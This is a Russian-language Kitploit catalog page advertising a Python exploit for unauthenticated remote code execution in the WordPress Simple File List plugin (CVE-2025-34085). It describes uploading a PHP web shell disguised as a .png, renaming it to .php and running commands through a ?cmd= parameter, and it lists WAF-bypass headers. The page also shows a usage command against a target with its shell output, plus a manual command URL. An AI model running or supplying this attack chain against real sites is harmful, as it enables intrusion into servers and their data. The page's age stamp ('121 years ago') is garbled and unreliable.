Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-34085 — Simple File List – Эксплойт RCE без аутентификации (CVE-2025-34085) | Kitploit
Инструменты/GitHubGitHub/mrjhaxcore/cve-2025-34085
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubmrjhaxcore/cve-2025-34085

CVE-2025-34085

Simple File List – Эксплойт RCE без аутентификации (CVE-2025-34085)

Репозиторий
121 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

📂 Simple File List – Неаутентифицированный RCE-эксплойт (CVE-2025-34085)

⚠️ Код эксплойта: Mrj Haxcore

Полностью рабочий Python-эксплойт для плагина WordPress Simple File List (<= 4.2.3), уязвимого к неаутентифицированному удалённому выполнению кода (RCE) из-за небезопасной логики загрузки и переименования файлов.


💣 Сводка уязвимости

  • Плагин: Simple File List (simple-file-list)
  • Версия: <= 4.2.3
  • CVE: CVE-2025-34085
  • Воздействие: Неаутентифицированные пользователи могут загрузить PHP-файл, замаскированный под .png, затем переименовать его в .php и выполнить произвольный код.
  • Требования: Аутентификация не требуется
  • Тип эксплойта: Загрузка файла → Обход переименования → Выполнение команд

✅ Возможности

  • 🚀 Полностью автоматизированная цепочка эксплойта
  • 📤 Ручной построитель multipart/form-data (обходит 415)
  • 🔁 Перебор переименования для .php, .php5, .phtml и т.д.
  • 🛡️ Реалистичные поддельные заголовки для обхода WAF
  • 🐚 Выполнение команд через ?cmd=
  • 🧼 Чистый вывод (без мусора �PNG)

  • 🛠 Использование

    root@kitploit:~
    python3 simple.py https://target.site
    
    [+] Uploading shell as 8dkls0qp.png...
    [+] Upload successful.
    [+] Trying to rename to: 8dkls0qp.php...
    [+] Rename successful: 8dkls0qp.php
    [+] Triggering shell: https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
    [+] Shell output:
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    
    Manual Visit
    
    https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami
    
    Скачать инструмент